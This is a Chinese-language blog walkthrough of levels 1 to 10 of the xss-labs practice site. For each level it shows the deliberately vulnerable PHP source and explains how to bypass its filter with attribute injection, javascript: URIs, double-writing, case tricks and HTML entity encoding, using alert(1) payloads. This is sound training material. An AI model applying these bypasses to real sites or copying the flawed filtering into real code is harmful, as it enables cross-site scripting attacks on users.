xss挑战(1~10)

最新推荐文章于 2024-06-04 18:11:56 发布
最新推荐文章于 2024-06-04 18:11:56 发布
阅读量1k 收藏
点赞数
文章标签: xss web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Osumail/article/details/105966506
版权

关注我的博客,访问更多内容!

xss闯关入口

less-1

查看源代码,

$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

并没有过滤,
payload:name=<script>alert(1)</script>

less-2

查看源代码,

$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>

有两处输出,第一处在echo处,但被做了转义处理,起到过滤效果,第二处在input处,没有过滤,所以选择在表单的input里攻击,注意语句闭合方式为 " ,
payload:" onclick="alert(1)

less-3

查看源代码,

$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />

两处输出位置都做了转义处理,都被过滤了,所以 ",<,>符号(双引号和尖括号)就没有效果了,但是源码里input里的value的闭合方式为 ',所以还是可以攻击的。
payload:' onclick='alert(1)

less-4

查看源代码,

$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />

两处输出位置,一处被转义了,input处没被转义,但是被做了函数处理,尖括号被替换为了空,和less-3的套路一样。
payload:" onclick="alert(1)

less-5

查看源代码,

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />

有两处输出,一处被做了转义处理,input处输入被做了小写和on,<script被做了替换处理,
payload:"><a href="javascript:alert(1)">xss</a>

less-6

查看源代码,

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">

有两处输出,一处被做了转义处理,input处<script,on,src,data,href被做了替换处理,但是没有做less-5中的小写处理,所以可以通过大写替换字绕过,
payload:" ONclick="alert(1)

less-7

查看源代码,

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">

有两处输出,一处被做了转义处理,input处做了小写处理和script,on,src,data,href被做了替换处理,可以利用双写来拼合成,例如oonn被处理后就变为了on,
payload:" oonnclick="alert(1)

less-8

查看源代码,

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
……
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

有两处输出,一处input做了转义处理,另一处做了小写处理和script,on,src,data,href," ,被做了替换处理,这题的关键在友情链接处,点击"添加友情链接"后会在友情链接出加入一个拼接的语句。
t的ASCII码116用表示为"&#116",同理:表示为"&#58",
payload:javascrip&#116:alert(1)

less-9

查看源代码,

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
……
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
……
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}

有两处输出,一处input做了转义处理,另一处做了小写处理和script,on,src,data,href," ,被做了替换处理,而且出现了strpos()函数,表示查找 “http://” 在字符串中第一次出现的位置。只要!=false,就会跳向可攻击的语句,所以构造的语句中要含有http://,利用javascript中的注释符//,
payload:javascrip&#116:alert(1)//http://

less-10

查看源代码,

$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">

有两处输出,一处被做了转义,一处input被作为隐藏表单(type=“hidden”)处理页面没有显示,需要先将隐藏表单触发显示出来,然后在input处攻击,看到url处可以get参数t_sort,所以可以构造payload了。
payload:url后加 &t_sort=xss" onclick=alert(1) type="text"

xss(1~10)关卡全部完成了,如有错误,欢迎在评论中指出!

Osumail
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss挑战1-10
weixin_45498459的博客
03-09 834
xss level1 代码 xsslevel1代码2第1中方法反射性第二种script标签level 3level4lelvel5scripta标签level6a链接">xss</alevle7lelve8level9level10 <!DOCTYPE html> <!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html...
XSS挑战1-10
kuller_Yan的博客
10-18 276
首先本次做题使用的XSS测试过滤payload为: <img src="avc"><a href="www"><script 'on> 第一题:直接payload <script>alert(1)</script> 第二题:查看源代码发现加了引号,直接绕过。 "><script>alert(1)</script><" 第三题: 源代码: <input name=keyword value='&amp
XSS挑战赛(xsslabs)1~10关通关解析
黄乔国PHP
03-06 769
XSS挑战赛,里面包含了各种XSS的防御方式和绕过方式,好好掌握里面的绕过细节,有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节,不是一个标准的答案,希望大家在渗透的时候有更多的思维。
xss-board:使用 Zombie.js 的简单 XSS 挑战示例
06-13
xss板 这是使用 Zombie.js ( ) 进行简单 XSS 挑战的示例。 机器人将每三分钟访问一次网站(取决于下面的 crontab 设置)并执行它找到的所有 Javascript 代码。 配置它 调整 cookie ('mag1c_c00k1e') 和标志 ('put_flag_here') 值。 对于 www 用户,comments 目录需要是可写的。 运行 只需将其添加到您的 crontab 中: */3 * * * * node bot.js >> /tmp/xss-bot.log
Xss练习(level1-10)
AmyBaby00的博客
09-04 598
Xss练习 找输入点,输出点,能往页面上写东西,写的东西可以反馈出来。例如:搜索框 “ ”双引号包裹,会被网页源代码 当作普通的字符串。不是代码执行 尖括号成对出现,闭合<> (Xss防护:就是把有危险的词组屏蔽掉) level1 找输入点:在url里面可以看到name=test,只需构造一个基本的语句,执行该语句即name=”这里就是先把input内的双引号和尖括号闭合,然后再写我们...
xss源码 最新版源码
10-24
xssing源码-xss平台源码 xss渗透平台 最新源码
XSS lab 1~14
m0_74047291的博客
11-10 235
xss初学者的作业
XSS挑战之旅1-10
weixin_52116519的博客
11-15 1290
XSS漏洞介绍。
xss挑战1-10
Marsper的博客
11-03 436
level1 没有任何过滤,直接URL后面加XSS测试语句 <script>alert('123')</script>; 弹窗 <script>alert('123')</script>; level2 有搜索框,像第一关一样在搜索框测试一下,但是没有像第一关一样弹窗 查看源码发现我们的XSS语句被赋值给value并且在input标签里,所以我们需要闭合value和input标签就可以正常弹窗了 1"><script>alert('1
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
xss-labs挑战(一) 1
08-08
xss-labs挑战(一) 1
xss game挑战笔记.pdf
02-11
xss game挑战笔记
ctf-browser-visitor:Bot访客服务,应对CTF中的XSS挑战
05-04
ctf浏览器访问者 Bot访问者应对CTF中的XSS挑战 http://127.0.0.1:5000/visit?job={"url":"url_to_visit","cookies":{"key":"value"}}
【杂记-浅谈XSS跨站脚本攻击】
叫我小虎就行了的博客
05-31 653
【杂记-浅谈XSS跨站脚本攻击】
使用pikachu Xss后台出现的问题
m0_74608722的博客
06-01 198
在进行xss-x漏洞实验的时候,一直出现上述错误,查找了很多,终于找到问题所在pikachu使用的数据库为同一个数据库,千万别被pkxss误导,以为pikachu还有一个数据库为pkxss,所以在配置的时候写下如下图的
DVWA-XSS(DOM)
weixin_45436292的博客
06-03 447
2.过滤输入的字符,例如 “ ’ ”,“ " ”,“<”,“>” 等非法字符;后端没有代码,点击select按钮动作是前端的JS代码进行处理的。观察后端代码进行了<script和大小写过滤,这里考虑闭合绕过。后,观察页面源码发现payload被插入到了前端界面中执行。但是可以通过注释符#绕过,注释符后面的内容不会发送到服务器。我们点击select之后,在URL后面加入。按之前Low level注入的话,结果如下。3.对输入到页面的数据进行编码。后端没有代码,观察前端代码。将payload改为。
DVWA-XSS(Reflected)
weixin_45436292的博客
06-04 527
反射型XSS可以用来窃取cookie。
大数据+统计分析+数字化转型+规划设计
最新发布
06-05
进入到数字化时代,数字化转型关系到企业与组织未来的生死和前途。不数字化转型等死,数字化转型找死, 等死就只有死路一条,找死很可能凤凰涅槃,重获新生。在焦虑与希望的驱使下,不少企业开始走上了转型之路,是华丽转身,还是飞蛾扑火,每个企业家都在用自己的勇敢去探寻结果,道阻且长,行则将至;行而不辍,未来可期。 适合:大数据分析应用相关的方案咨询顾问 场景:数据治理、数据分析、数据运营、数据赋能、数据挖掘、培训等 目标:数字化转型、管理赋能、业务赋能、行业数字化应用
XSS Challenges Stage #1
04-28
XXSSXSSXSS挑战XSS挑战XSS挑战阶段XSS挑战阶段是XSS挑战阶段是一XSS挑战阶段是一种XSS挑战阶段是一种安XSS挑战阶段是一种安全XSS挑战阶段是一种安全测试XSS挑战阶段是一种安全测试方法XSS挑战阶段是一种安全测试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值